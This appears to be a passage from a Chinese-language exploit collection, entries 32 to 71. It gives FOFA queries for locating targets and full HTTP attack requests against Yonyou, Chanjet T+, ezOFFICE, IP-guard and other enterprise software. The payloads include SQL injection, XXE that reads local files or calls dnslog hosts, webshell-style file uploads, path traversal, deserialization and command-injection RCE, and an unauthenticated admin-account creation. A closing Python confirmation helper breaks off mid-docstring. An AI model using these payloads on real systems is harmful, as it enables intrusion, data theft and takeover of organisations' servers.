Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo API SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
 <soapenv:Header/>
 <soapenv:Body>
  <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
   <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
  </ser:getUserNameById>
 </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php API arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空社会化商业ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the packet below to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full packet
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
 "storeID":{
  "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
   "StartInfo":{
    "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
   }
  }
 }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
 "storeID":{
  "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
   "StartInfo":{
    "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c ping 6qevyvmi.dnslog.pw"
   }
  }
 }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The sql parameter is base64; c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3, so the statement is executed as supplied and exported to Excel.

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request the file the injected command wrote:
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

A vulnerable target answers about 5 seconds later than with a benign sId.

65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created without authentication.

POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9 (the hex MD5 of the injected value 102103122) when the target is vulnerable.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
newdocId and filename set the name of the written file, dir sets the directory it is written to, and fileType sets its extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is then reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The ;.js path-parameter suffix makes an extension-based authentication filter treat the request as a static resource while the container still executes the JSP; a 5-second delay confirms the injection.

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

The SID header carries the command base64-encoded: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk= decodes to type C:\Windows\win.ini.

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

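The MSSQL probes in entries 57, 58, 64, 66, 68, 69 and 71 confirm the injection in one of two ways: the hash oracle (entries 58 and 66) makes the database compute HashBytes('MD5', seed) and looks for that digest in the response, and the WAITFOR DELAY probes (64, 68, 69, 71) rely on timing. The helpers below are an added example, not code from the original article or from any of the vendors; they compute the expected digest locally and apply a baseline-corrected timing check so a single slow response on a loaded server is not mistaken for a confirmation. The request function `send` is whatever issues the HTTP request in your scanner; `simulated_sender` is a stand-in for the demo only.

```python
"""Helpers for confirming the MSSQL injection probes used in the entries
above without relying on error text. Added example, not from the original
article. It needs no network: `send` is whatever function issues the
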